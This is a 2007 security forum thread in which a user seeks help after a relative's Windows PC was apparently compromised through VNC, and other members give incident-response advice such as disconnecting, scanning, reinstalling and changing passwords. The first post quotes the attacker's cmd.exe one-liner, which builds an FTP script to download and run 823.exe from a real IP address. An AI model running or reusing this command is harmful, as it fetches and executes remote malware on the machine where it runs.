
Help... Worm?


venom77

Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sat Mar 24, 2007 9:50 pm

Help... Worm?

Hey guys,

My brother-in-law just called me frantically saying his computer had been hacked. He was in a remote session to his computer from work using VNC when he suddenly lost, and could not regain, the connection.

When he got home, he noticed that when he clicked start > run, the last command was:

Code:
cmd.exe /c del i&echo open 24.158.178.152 27206 > i&echo user 1 1 >> i &echo get 823.exe >> i &echo quit >> i &ftp -n -s:i &823.exe&del i&exit


Now, if you connect to that IP on that port, you'll be greeted with "220 Reptile welcomes you.." which looks like a standard FTP greeting, but accepts no commands. Everything I enter I receive a 503 command unknown. Also, none of his system commands are working (i.e. cd, netstat, ipconfig, etc.). Sounds sorta like a rootkit.

Any suggestions?

LSOChris

Post Sat Mar 24, 2007 9:59 pm

Re: Help... Worm?

unplug network cable...

from another computer download linux distro of your choice...

burn disc...

stick in hacked computer and reboot :-)

seriously though, do #1 and start running your AV and rootkit finder tools to try to find out what 823.exe did or is still doing. hopefully you can clean it up but it might be time to back up (and be careful what you back up!) and reinstall.

heffnercj

EH-Net Columnist

Posts: 69

Joined: Thu Mar 15, 2007 2:45 pm

Post Sat Mar 24, 2007 10:01 pm

Re: Help... Worm?

Found a discussion at SecurityFocus that might be related...the app discussed here had the same 220 string:

http://www.securityfocus.com/archive/10 ... 0/threaded

venom77

Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sat Mar 24, 2007 10:16 pm

Re: Help... Worm?

Thanks guys (quick reply too!).

That's what I had suggested pretty much. He's working on it offline now I believe (he's in a different state). I saw that link as well. That leads me to believe that the IP listed in the command is that of a system hosting the worm then, right? Also, so far AVG and Norton have not picked up anything. I haven't been able to locate anything on '823' as of yet.

Kevan

Jr. Member

Posts: 95

Joined: Fri Mar 16, 2007 7:20 pm

Post Sun Mar 25, 2007 9:25 am

Re: Help... Worm?

Norton is horrible. I downloaded ClamWin onto my parents' computer running Windows, and it found 9024 infected files/viruses on their computer. I put them in a quarantine folder and scanned it with Norton; it never found anything.

I may be a newbie, but I am willing to learn.

Cutaway

Jr. Member

Posts: 96

Joined: Mon Nov 20, 2006 5:02 pm

Post Sun Mar 25, 2007 11:48 am

Re: Help... Worm?

Not sure if you have identified how the system was compromised or how privileges were escalated.  Milw0rm has an exploit for 823.c but it is for "Dream FTP" and it does not appear to be a local exploit.  You can find the source: http://www.milw0rm.org/exploits/823

Once you have cleaned the system you are going to want to identify how the system was compromised before you put it back online.  You will want to also check any systems that are located on the same network as they might have been the source of the intrusion or may have fallen victim to attacks from this system.  If the other systems are rooted then you may need to resort to monitoring network traffic.

One thing you might consider is backing up all of the business files and reloading the system.  Sometimes this is the best way to handle incidents involving rootkits.  By storing files to a separate media and then scanning them from a separate, protected, system you can be sure that there is no "detectable" malware in these files.  Then you can DBNuke the old hard drive and get rid of anything except for firmware related malware which is highly unlikely.

Just throwing options out there for you to consider as you help your friend with additional risk analysis.

Good luck,
Cutaway

Go forth and do good things,
Cutaway

plik

Newbie

Posts: 31

Joined: Tue Dec 19, 2006 9:32 am

Location: North - UK

Post Sun Mar 25, 2007 1:42 pm

Re: Help... Worm?

As far as I'm aware (I'm sure someone will correct me if I'm wrong) commands only appear in start > run if they've been run from there. So someone had access to his desktop.

There has been a large increase in scanning for VNC servers recently, so I would suspect that was the point of entry.

Cutaway

Jr. Member

Posts: 96

Joined: Mon Nov 20, 2006 5:02 pm

Post Sun Mar 25, 2007 7:44 pm

Re: Help... Worm?

Quote: commands only appear in start > run if they've been run from there.

That is actually a very good point.  If this is the case then either the VNC connection was exploited or, more probably, brute forced.  The cracker apparently had a VNC connection to the system.  This system then could have been used to compromise another system using 823.exe or to escalate privileges on the local host.

If your brother-in-law is like most people he might be using this password or something like it in multiple places.  He may want to change ALL of his passwords to something completely different.

Go forth and do good things,
Cutaway

venom77

Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sun Mar 25, 2007 9:55 pm

Re: Help... Worm?

Thanks again for all of the great tips. All are very helpful and much appreciated. I will pass the information along to my brother-in-law. I haven't heard back from a couple of emails I sent, so I'm not sure what course of action he's taken.
